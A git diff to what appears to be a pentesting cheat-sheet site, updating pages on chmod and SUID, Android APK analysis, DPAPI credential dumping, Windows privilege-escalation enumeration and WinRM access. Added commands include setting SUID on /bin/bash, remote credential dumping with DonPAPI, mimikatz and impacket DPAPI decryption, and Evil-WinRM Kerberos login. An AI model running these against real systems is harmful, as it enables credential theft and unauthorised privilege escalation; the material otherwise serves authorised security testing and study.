modified WinRM pentesting

Author: hdks-bug

src/exploit/linux/management/file-and-directory-permission-in-linux.md

@@ -4,7 +4,7 @@ description: We can change permissions of file/directory using `chmod` command.
 tags:
     - Linux
 refs:
-date: 2023-10-30
+date: 2025-03-19
 draft: false
 ---
 
@@ -25,8 +25,6 @@ For example,
 |Read + Write|`4+2=6`|`rw`|
 |Read|`4`|`r`|
 
-<br />
-
 ## Cheat Sheet
 
 ### Read/Write/Execute
@@ -42,7 +40,6 @@ For example,
 |All|`chmod 777 sample.txt`|
 ||`chmod a+rwx sample.txt`|
 
-
 ### Read/Write
 
 |Target|Command|
@@ -56,7 +53,6 @@ For example,
 |All|`chmod 666 sample.txt`|
 ||`chmod a+rw sample.txt`|
 
-
 ### Read/Execute
 
 |Target|Command|
@@ -83,14 +79,15 @@ For example,
 |All|`chmod 333 sample.txt`|
 ||`chmod a+wx sample.txt`|
 
-<br />
-
 ## Set SUID/SGID
 
 By adding **SUID** or **SGID**, we can execute the file as the file owner/group.  
 This may cause **local privilege escalation**.
 
 ```bash
+# SUID for all users
+chmod 4777 /bin/bash
+
 # SUID for user owner
 chmod u+s /opt/example.sh
 

src/exploit/mobile/android/android-pentesting.md renamed to src/exploit/mobile/android/index.md

@@ -6,45 +6,55 @@ tags:
     - Mobile
     - Reverse Engineering
 refs:
-date: 2022-12-30
+date: 2025-03-19
 draft: false
 ---
 
 ## APK Analysis
 
-### 1. Extract APK File to DEX File
+If we have a `.apk` file, we can investigate the file using some tools.
 
-You can retrieve "classes.dex".
+### Using JADX
 
-```sh
-unzip example.apk -d ./Example
+The most easiest way to analyze a `.apk` file, use `jadx-gui`.
+
+```bash
+jadx-gui ./example.apk
 ```
 
-Now you can observe files.  
-For **React Native**, it may contain the sensitive information in the bundle file.
+### Using JD
 
-```sh
-strings assets/index.android.bundle
-```
+1. Extract APK File to DEX File
 
-### 2. Convert DEX to JAR
+    You can retrieve "classes.dex".
 
-You can retrieve JAR file.
+    ```sh
+    unzip example.apk -d ./Example
+    ```
 
-```sh
-d2j-dex2jar classes.dex
-```
+    Now you can observe files.  
+    For **React Native**, it may contain the sensitive information in the bundle file.
 
-### 3. Observation
+    ```sh
+    strings assets/index.android.bundle
+    ```
 
-**JD-GUI** is a JAVA decompiler tool. It reveals class in the JAR file.  
-Open JD-GUI.
+2. Convert DEX to JAR
 
-```sh
-jd-gui
-```
+    You can retrieve JAR file.
+
+    ```sh
+    d2j-dex2jar classes.dex
+    ```
+
+3. Observation
 
-<br />
+    **JD-GUI** is a JAVA decompiler tool. It reveals class in the JAR file.  
+    Open JD-GUI.
+
+    ```sh
+    jd-gui
+    ```
 
 ## Static Analysis
 
@@ -63,8 +73,6 @@ ghidra
 
     MobSF (Mobile Security Framework) is an automated all-in-one mobile application pentesting, malware analysis framework capable of static and dynamic analysis.
 
-<br />
-
 ## Dynamic Analysis
 
 If you pentest on virtual devices, you need to install some emulator as below. 
@@ -73,8 +81,6 @@ If you pentest on virtual devices, you need to install some emulator as below.
 - **[Genymotion](https://www.genymotion.com/)**
 - **[Nox](https://www.bignox.com/)**
 
-<br />
-
 ## Android Backup (.ab)
 
 ### Extract

src/exploit/windows/privilege-escalation/dumping-credentials-from-windows-vault.md

@@ -7,11 +7,21 @@ tags:
 refs:
     - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords
     - https://tools.thehacker.recipes/mimikatz/modules/vault/cred
-date: 2023-03-26
+date: 2025-03-19
 draft: false
 ---
 
-## 1. Enumerate Credentials
+## Automation
+
+Using [DonPAPI](https://github.com/login-securite/DonPAPI), we can dump credentials remotely.
+
+```bash
+donpapi collect -u 'username' -p 'password' -d example.local --dc-ip <target-ip> -t ALL --fetch-pvk
+```
+
+## Manual Dumping
+
+### 1. Enumerate Credentials
 
 ```powershell
 # Under %APPDATA% folder
@@ -23,7 +33,7 @@ Get-ChildItem C:\Users\<user>\AppData\Local\Microsoft\Credentials\
 Get-ChildItem -Hidden C:\Users\<user>\AppData\Local\Microsoft\Credentials\
 ```
 
-## 2. Dump Credential Information
+### 2. Dump Credential Information
 
 ```powershell
 mimikatz # dpapi::cred /in:C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\123ABC...
@@ -33,7 +43,7 @@ mimikatz # dpapi::cred /in:C:\Users\<user>\AppData\Local\Microsoft\Credentials\1
 
 We can retrieve the `guidMasterKey` value that is used for the next section.
 
-## 3. Decrypt MasterKey
+### 3. Decrypt MasterKey
 
 The DPAPI keys are stored under `%APPDATA%\Microsofr\Protect\` or `%LOCALAPPDATA%\Microsoft\Protect\` folder. These keys are used for encrypting
 
@@ -62,13 +72,25 @@ Now decrypt the master keys:
 mimikatz # dpapi::masterkey /in:C:\Users\<user>\AppData\Roaming\Microsoft\Protect\{SID}\{STRING} /rpc
 ```
 
-We can get the `key` value that is the decrypted Master Key.
+We can get the `key` value that is the decrypted Master Key.  
 
-## 4. Dump Credentials
+Alternatively, we can use `impacket-dpapi` command in our attack machine. We need to download the protected file under the `C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<sid>\`  in the target Windows machine.
+
+```bash
+impacket-dpapi masterkey -file <protected_file> -sid <user_sid> -password <password>
+```
+
+### 4. Dump Credentials
 
 We can dump credentials using the collected Credential value and decrypted Master Key (domainkey).
 
 ```powershell
 # Specify '/<guidMasterKey>::<masterkey>'
 mimikatz # dpapi::cred /in:C:\Users\<user>\AppData\Local\Microsoft\Credentials\123ABC... /01234567-890abcde...::abcdef...
 ```
+
+Alternatively, we can use `impacket-dpapi` command in our attack machine. We need to download the credential file under the `C:\Users\<user>\AppData\Roaming\Microsoft\Credentials` in the target Windows machine.
+
+```bash
+impacket-dpapi credential -file <credential_file> -key <decrypted_key>
+```

src/exploit/windows/privilege-escalation/index.md

@@ -8,7 +8,7 @@ tags:
 refs:
     - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
     - https://learn.microsoft.com/en-us/powershell/scripting/samples/working-with-registry-keys?view=powershell-7.3
-date: 2025-03-15
+date: 2025-03-19
 draft: false
 ---
 
@@ -107,6 +107,10 @@ dir "C:\Users\<user>\AppData\Local\Packages\"
 dir "C:\Users\<user>\AppData\Roaming\Thudnerbird\Profiles\"
 dir "C:\Program Files\hMailServer\Data\"
 dir "C:\Program Files (x86)\hMailServer\Data\"
+
+# DPAPI protected data (https://www.thehacker.recipes/ad/movement/credentials/dumping/dpapi-protected-secrets)
+dir -Force C:\Users\<user>\AppData\Local\Microsoft\Credentials\
+dir -Force C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\
 ```
 
 ### Find Vulnerable Privileges

src/exploit/windows/protocol/winrm-pentesting.md

@@ -5,7 +5,7 @@ tags:
     - Windows
 refs:
     - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
-date: 2024-02-18
+date: 2025-03-19
 draft: false
 ---
 
@@ -21,14 +21,12 @@ msfconsole
 msf > use auxiliary/scanner/winrm/winrm_login
 ```
 
-<br />
-
-## Connect with Evil-WinRM
+## Connect
 
 **[Evil-WinRM](https://github.com/Hackplayers/evil-winrm)** is a Windows Remote Management shell for pentesting.  
 Below are list of commands for each situation.
 
-### Connect
+### Using Username/Password
 
 ```powershell
 evil-winrm -i <target-ip> -u username -p password
@@ -54,9 +52,46 @@ If you have private key and public key, you can use them for authentication.
 evil-winrm -i <target-ip> -S -k private.key -c public.key
 ```
 
-### Commands
+### Using Kerberos Authentication
+
+If we have a Kerberos ticket of a user, we can login with its ticket, but some settings are required.  
+At first, we need to modify the `nameserver` value in the `/etc/resolv.conf` in our attack machine.
+
+```bash
+nameserver <target-ip>
+```
+
+and modify `/etc/krb5.conf`  (or create a new one if it does not exist) in our attack machine as below:
+
+```bash
+[libdefaults]
+    default_realm = EXAMPLE.LOCAL
+    dns_lookup_realm = true
+    dns_lookup_kdc = true
+ 
+[realms]
+    EXAMPLE.LOCAL = {
+        kdc = dc.example.local
+        admin_server = dc.example.local
+        default_domain = example.local
+    }
+ 
+[domain_realm]
+    example.local = EXAMPLE.LOCAL
+    .example.local = EXAMPLE.LOCAL
+```
+
+Note that `example.local` and `dc.example.local` must be added to `/etc/hosts`.  
+Now set the environment variable and login with `evil-winrm`:
+
+```bash
+export KRB5CCNAME=<username>.ccache
+evil-winrm -i dc.example.local -r example.local
+```
+
+## Commands
 
-After connecting, we can use a lot of useful commands to exploit.  
+After connecting with `evil-winrm`, we can use a lot of useful commands to exploit.  
 Note that **we need to specify the absolute path for uploading and downloading.**
 
 ```powershell
@@ -69,8 +104,6 @@ PS> download c:\\Users\Administrator\Desktop\example.txt ./example.txt
 PS> services
 ```
 
-<br />
-
 ## Command Execution with NetExec
 
 ```sh
@@ -82,8 +115,6 @@ netexec winrm <target-ip> -d DOMAIN -u username -p password -X '$PSVersionTable'
 netexec winrm <target-ip> -d DOMAIN -u username -H <HASH> -x 'whoami'
 ```
 
-<br />
-
 ## OMIGOD (CVE-2021-38647)
 
 Open Management Infrastructure (OMI) is vulnerable to Remote Code Execution (RCE).